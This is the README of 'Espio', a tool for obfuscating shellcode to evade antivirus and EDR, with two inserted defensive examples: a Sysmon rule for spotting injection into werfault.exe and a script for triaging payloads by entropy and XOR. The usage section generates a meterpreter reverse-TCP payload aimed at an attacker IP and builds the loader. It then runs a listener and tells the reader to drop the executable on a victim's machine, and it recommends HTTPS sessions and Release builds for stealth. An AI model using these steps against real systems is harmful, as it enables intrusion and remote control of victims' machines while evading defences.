Shellcode obfuscation tool to avoid AV/EDR.
Features
- Obfuscation - base64 encoding and XOR encryption with a randomly generated key.
- Sandbox Bypass - custom sleep function.
- DLL Unhooking - full unhook of ntdll.dll.
- Process Injection - injecting the payload to werfault.exe.
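For the injection feature above, here is what the same activity looks like from the defender's side. This is an added example, not part of Espio: a small rule run over constructed Sysmon-style ProcessAccess (Event ID 10) and CreateRemoteThread (Event ID 8) records that flags any image outside an allowlist opening werfault.exe with write/thread-creation rights or starting a thread in it. The JSON-lines event shape, the allowlist and the sample paths are assumptions; the access-right constants are the documented Win32 values.

```python
import json

# Win32 process access rights; together they let a caller write code into
# another process and start a thread there.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

TARGET = "werfault.exe"

# Hypothetical allowlist of images expected to touch werfault.exe; tune per environment.
ALLOWED_SOURCES = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\csrss.exe",
}

# Constructed Sysmon-style events (one JSON object per line); not captured telemetry.
CONSTRUCTED_EVENTS = r"""
{"EventID": 10, "SourceImage": "C:\\Users\\alice\\Downloads\\Espio.exe", "TargetImage": "C:\\Windows\\System32\\WerFault.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 8, "SourceImage": "C:\\Users\\alice\\Downloads\\Espio.exe", "TargetImage": "C:\\Windows\\System32\\WerFault.exe", "StartAddress": "0x000001D2A3B40000"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\WerFault.exe", "GrantedAccess": "0x1400"}
{"EventID": 8, "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\System32\\notepad.exe", "StartAddress": "0x00007FF6A1230000"}
"""


def parse_events(text):
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_werfault_injection(events):
    """Return alerts for ProcessAccess (10) / CreateRemoteThread (8) events aimed at werfault.exe."""
    alerts = []
    for ev in events:
        src = ev.get("SourceImage", "").lower()
        dst = ev.get("TargetImage", "").lower()
        # Only care about werfault.exe as the target, and skip known-good callers.
        if not dst.endswith("\\" + TARGET) or src in ALLOWED_SOURCES:
            continue
        eid = ev.get("EventID")
        if eid == 10:
            # GrantedAccess is a hex string; mask it against the injection rights.
            granted = int(ev.get("GrantedAccess", "0"), 16)
            if granted & INJECT_MASK:
                alerts.append({
                    "EventID": 10,
                    "SourceImage": ev["SourceImage"],
                    "reason": f"access 0x{granted:X} includes write/thread rights",
                })
        elif eid == 8:
            alerts.append({
                "EventID": 8,
                "SourceImage": ev["SourceImage"],
                "reason": "remote thread created in werfault.exe",
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_werfault_injection(parse_events(CONSTRUCTED_EVENTS)):
        print(alert)
```

The csrss.exe access with 0x1400 (query-only rights) is ignored even before the allowlist check, which keeps the rule quiet on the routine handle opens that crash reporting itself produces; the two Espio.exe events are the ones that fire.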
Requirements
Espio requires Python 3 and Visual Studio.
Usage
- Clone the repository:
git clone https://github.com/Konis-Bros/Espio.git
- Generate the shellcode. In this demonstration we will be using msfvenom on a Kali machine:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<Attacker IP> LPORT=1337 -f raw -o shellcode
- Put the shellcode in the cloned repository and use the obfuscator.py tool to obfuscate it:
python3 obfuscator.py shellcode
Note: the shellcode is written out as obfuscatedPayload.bin together with its key file key.bin, both saved in loader/Espio.
- Open loader/Espio.sln, the Visual Studio solution file.
- Build the project. Note that the executable file will be located at loader/x64/Debug/Espio.exe.
- On the attacker's machine, listen for TCP connections on the defined port. In our case, run Metasploit's multi/handler on port 1337.
- Drop the executable onto the victim's machine and run it.
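An analyst who recovers the two artifacts from step 3 (the obfuscated payload and its key file) wants to confirm what they are and get the original bytes back for inspection. This is an added example, not Espio's obfuscator.py: it scores a blob by byte entropy, checks whether it is base64-wrapped, and, when a key is available, reverses the XOR for analysis. It assumes the layout is XOR first and base64 second with a repeating key (the README does not state the order or key length), and it builds its own harmless sample in place of real shellcode.

```python
import base64
import math
import random
from collections import Counter

# Constructed sample: plain text stands in for the shellcode bytes (length is a multiple of 3,
# so the base64 form carries no padding).
SAMPLE_PLAINTEXT = b"The quick brown fox jumps over the lazy dog. " * 23

# Constructed key, seeded so the example is reproducible; stands in for key.bin.
_rng = random.Random(1337)
SAMPLE_KEY = bytes(_rng.getrandbits(8) for _ in range(len(SAMPLE_PLAINTEXT)))


def xor_bytes(data, key):
    """XOR data with a repeating key; the operation is symmetric, so it also reverses itself."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def shannon_entropy(data):
    """Bits of entropy per byte, from 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def build_sample_artifact(plaintext=SAMPLE_PLAINTEXT, key=SAMPLE_KEY):
    """Stand-in for obfuscatedPayload.bin under the assumed XOR-then-base64 layout."""
    return base64.b64encode(xor_bytes(plaintext, key))


def try_base64(blob):
    """Strict base64 decode; returns None if the blob is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True)
    except ValueError:
        return None


def triage(blob, key=None):
    """Report entropy at each layer and, if a key is supplied, the recovered plaintext."""
    report = {
        "wrapper_entropy": shannon_entropy(blob),
        "is_base64": False,
        "inner_entropy": None,
        "recovered": None,
        "recovered_entropy": None,
    }
    inner = try_base64(blob)
    if inner is not None:
        report["is_base64"] = True
        report["inner_entropy"] = shannon_entropy(inner)
    else:
        inner = blob
    if key is not None:
        recovered = xor_bytes(inner, key)
        report["recovered"] = recovered
        report["recovered_entropy"] = shannon_entropy(recovered)
    return report


if __name__ == "__main__":
    result = triage(build_sample_artifact(), SAMPLE_KEY)
    for name in ("wrapper_entropy", "is_base64", "inner_entropy", "recovered_entropy"):
        print(f"{name}: {result[name]}")
    print("recovered matches sample:", result["recovered"] == SAMPLE_PLAINTEXT)
```

The entropy profile is the useful signal for triage: base64 text caps out near 6 bits per byte, the XORed layer under a random key sits close to 8, and a correct key brings the recovered bytes back down to the much lower entropy of the real content. A key that produces no such drop is the wrong key or the wrong layout.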
Recommendations
- In steps 2 and 6, create the meterpreter session over HTTPS. For more information see Meterpreter HTTP/HTTPS Communication.
- In step 5, change the build configuration from Debug to Release. Note that the executable file will now be located at loader/x64/Release/Espio.exe.
Tests
Espio was examined against:
Windows Defender:
Avira Prime:
ANTISCAN:
Authors and Acknowledgments
License
Distributed under the MIT License. See LICENSE.txt for more information.